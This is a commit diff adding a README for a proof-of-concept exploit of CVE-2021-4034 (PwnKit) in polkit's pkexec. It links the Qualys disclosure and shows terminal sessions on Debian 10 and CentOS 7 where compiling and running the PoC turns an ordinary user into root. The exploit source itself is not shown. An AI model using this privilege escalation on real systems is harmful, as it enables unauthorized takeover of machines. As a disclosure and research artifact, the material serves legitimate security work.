parent
282f5160c6
commit
b1bf6865c3
@ -0,0 +1,31 @@ |
|||||||
|
# CVE-2021-4034 |
||||||
|
PoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) |
||||||
|
|
||||||
|
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 |
||||||
|
|
||||||
|
# PoC |
||||||
|
|
||||||
|
Verified on Debian 10 and CentOS 7. |
||||||
|
|
||||||
|
``` |
||||||
|
user@debian:~$ grep PRETTY /etc/os-release |
||||||
|
PRETTY_NAME="Debian GNU/Linux 10 (buster)" |
||||||
|
user@debian:~$ id |
||||||
|
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) |
||||||
|
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc |
||||||
|
user@debian:~$ ./cve-2021-4034-poc |
||||||
|
# id |
||||||
|
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user) |
||||||
|
``` |
||||||
|
|
||||||
|
``` |
||||||
|
[user@centos ~]$ grep PRETTY /etc/os-release |
||||||
|
PRETTY_NAME="CentOS Linux 7 (Core)" |
||||||
|
[user@centos ~]$ id |
||||||
|
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 |
||||||
|
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc |
||||||
|
[user@centos ~]$ ./cve-2021-4034-poc |
||||||
|
sh-4.2# id |
||||||
|
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 |
||||||
|
sh-4.2# exit |
||||||
|
``` |
Loading…
Reference in new issue